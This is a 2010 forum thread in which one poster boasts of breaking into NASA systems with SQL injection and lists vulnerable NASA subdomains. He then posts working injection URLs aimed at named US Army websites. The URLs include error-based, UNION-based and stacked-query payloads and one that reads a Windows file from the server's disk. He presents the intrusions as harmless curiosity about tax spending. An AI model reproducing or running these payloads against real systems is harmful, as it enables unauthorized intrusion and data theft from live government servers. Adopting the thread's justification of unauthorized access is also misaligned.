Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
If you have some interesting news or want to throw up a link to discuss it, here's the place. Anything is okay, even shameless vendor launches (since that is often applicable to what we work on). 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
NASA exploitation by complex SQL injection..."vinnu"
Posted by: vinnu
Date: February 13, 2010 12:12AM

Jaijeya
I am exploring NASA for SQL injections and XSS since mid January and to my wonder every 3 minutes I've discovered a new SQL injection vulnerability or XSS.
The SQL injection allowed me to access user credentials, File System and internal networks and precious information from their servers.

The database servers deployed by them vary to nearly all type of servers on different systems like Sybase, Oracle, MySQL, SQL server, MS-Access, NoSQL etc.

Some of vulnerable NASA subdomains are:


www.jpl.nasa.gov
pds.jpl.nasa.gov
ssd.jpl.nasa.gov
robotics.nasa.gov
ppj-web-3.jpl.nasa.gov
software.gsfc.nasa.gov
sbir.nasa.gov
science.gsfc.nasa.gov
www.igpp.ucla.edu
directreadout.sci.gsfc.nasa.gov
aerospacescholars.jsc.nasa.gov
www.leadership.nasa.gov
sdo.gsfc.nasa.gov
------
------
------ and so many.
more information is available on Orkut's following community:

http://www.orkut.co.in/Main#CommMsgs?cmm=25319870&tid=5428640088652321772&na=4&nst=28&nid=25319870-5428640088652321772-5431980662675543020


and Penetration pictures can be viewd at:
http://www.orkut.co.in/Main#Album?uid=12341139053341897468&aid=1264214598


"vinnu"
LOX (Legion Of Xtremers)INDIA

Options: ReplyQuote
Pentagone SQL Injection
Posted by: vinnu
Date: February 14, 2010 01:43PM

Check following error based injection:

https://www.dms.army.mil/acro_list.cfm?startrow=30&orderby=cast((select+top+1+substring(name,1,600)+from+sysobjects+order+by+NEWID())+as+int)&sort=&clear=true

Options: ReplyQuote
Re: NASA exploitation by complex SQL injection..."vinnu"
Posted by: rvdh
Date: February 14, 2010 04:46PM

Yes this has been the case for ages on their networks, apparently they simply gave up administrating tons of boxes all over the place, somehow I can relate.

Options: ReplyQuote
Re: NASA exploitation by complex SQL injection..."vinnu"
Posted by: vinnu
Date: February 14, 2010 11:37PM

Yes thats right.
I think now they should prepare a virus like in Terminator movie to administer their huge networks automatically and that can learn and identify the problems and fix them automatically.

Options: ReplyQuote
Re: NASA exploitation by complex SQL injection..."vinnu"
Posted by: vinnu
Date: February 15, 2010 12:46AM

This is MS Jet database, check the file system access using SQL injection:

http://www.mepcom.army.mil/publications/results.asp?topic=Forms'+union+select+1,File,Message,Line,Time,6,Tag,8,9,10,11+from+[TEXT;DATABASE=c:%5Cwindows;HDR=YES;FMT=Delimited].[setuplog.txt]'&pubNo=&date1=&date2=&pubDesc=

Options: ReplyQuote
Re: NASA exploitation by complex SQL injection..."vinnu"
Posted by: rvdh
Date: February 15, 2010 08:27AM

Yeah, most folks have enough trouble administrating 1 box (their own) let alone thousands of boxes. There is no way you can secure them all effectively. Imagine the horror of a patch schedule for all those boxes. It would imply they need at least 1 guy administrating 10 to 20 boxes or they loose track. That's a lot of guys, all working in different departments, different skills, no web application skills whatsoever. So I'm guessing they made the trade-of with a security policy where sensitive data is in different more tightly monitored clusters.



Edited 2 time(s). Last edit at 02/15/2010 08:29AM by rvdh.

Options: ReplyQuote
Re: NASA exploitation by complex SQL injection..."vinnu"
Posted by: vinnu
Date: February 16, 2010 01:33AM

Yeah thats right.
Somewhere I read that Pentagons Cyber Security Budget is over 100 million$.
This is a great amount.
Another thing is that actually we talk about home PCs can be used to attack as zombie to other networks, likewise these system's can also be used for further attacks or exploration of their internal networks.
In some of NASA cases same was true, the compromised database allowed me to further enumerate internal network.

Actually they are doing what is taught are preliminary avoiding terms during learning secure software development. I mean they are employing security at perimeter at some places like HTTP level and not at the application level.
Like in some cases, u can grab information of internal systems or server itself by causing something unexpected like any error and the applications are throwing huge heaps of information enough for an attacker whereas the http filter doesn't stop such outward flow, so at those networks only the invard traffic is analysed.

Well all in all, we are just curious people and can just attempt ourself to know where is our taxes are actually being used up and how effective.
There is no opposition (of assembly off course) to debate on this or stop this useless expending.

Options: ReplyQuote
Re: NASA exploitation by complex SQL injection..."vinnu"
Posted by: vinnu
Date: February 16, 2010 11:31AM

A blind SQL injection in Pentagon server:
http://carlislebarracks.carlisle.army.mil/about/hours.cfm?recid=59order+by+13
The stacked queries are also working check two cases below if query returns properly it means db engine is Microsoft SQL server:
http://carlislebarracks.carlisle.army.mil/about/hours.cfm?recid=5order+by+13;select+@@version
and now test this:
http://carlislebarracks.carlisle.army.mil/about/hours.cfm?recid=5order+by+13;select+@@veion





"vinnu"
LOX (Legion Of XCtremers)INDIA



Edited 1 time(s). Last edit at 02/16/2010 11:31AM by vinnu.

Options: ReplyQuote
Re: NASA exploitation by complex SQL injection..."vinnu"
Posted by: vinnu
Date: February 16, 2010 11:50AM

And now a perfect query:

http://carlislebarracks.carlisle.army.mil/about/hours.cfm?recid=-5union+all+select+1,@@version,user_name(),suser_name(),@@servername,6,7,8,9,10,11,12,13

Options: ReplyQuote


Sorry, only registered users may post in this forum.